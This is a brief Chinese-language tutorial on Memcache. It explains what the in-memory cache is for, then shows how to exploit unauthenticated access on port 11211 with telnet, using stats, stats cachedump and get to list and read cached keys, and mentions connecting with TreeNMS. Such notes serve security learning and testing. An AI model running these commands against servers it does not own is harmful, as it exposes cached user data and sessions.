Memcache未授权漏洞

Memcache是啥

1、memcache就是一个数据库、但是数据存在内存中。常用来做缓存服务器、将从数据库查询的数据缓存起来，减少数据库查询、加快查询速度。
2、明确使用场景：缓存服务器
3、适合存储的数据：
①访问比较频繁的数据，安全性差的数据，丢失无所谓的数据。
②数据更新，比较频繁的数据，比如用户的在线状态。
③数据的单个键值不能太大，不要超过1Mb数据。
链接
[存储机制]（https://www.cnblogs.com/zhoujinyi/p/5554083.html）

Memcache未授权漏洞

默认端口为11211，使用telnet登陆即可
telnet ip 11211

stats        //查看memcache 服务状态 
stats items  //查看所有items 
   >STAT items:1:number 39  # 1为slab_id，39为slab中key的数量
stats cachedump slab_id 0 //获得缓存key，0代表全部列出,cachedump每次返回的数据只有2M
   >ITEM 82f561c5bc94c9bdda43a73abe64dc32 [46152 b; 0 s]
    ITEM c1ec82a800bba509cbdc84b59d7bc73e [49403 b; 0 s]
    ITEM c45a0f4302301fcd054f83ea11c832a9 [46654 b; 0 s]
    ITEM 39bf3fe8f9c15f18901599daaf0e89bf [48299 b; 0 s]
get 82f561c5bc94c9bdda43a73abe64dc32   //查看key的值

使用TreeNMS连接

安装TreeNMS，尝试连接，连接成功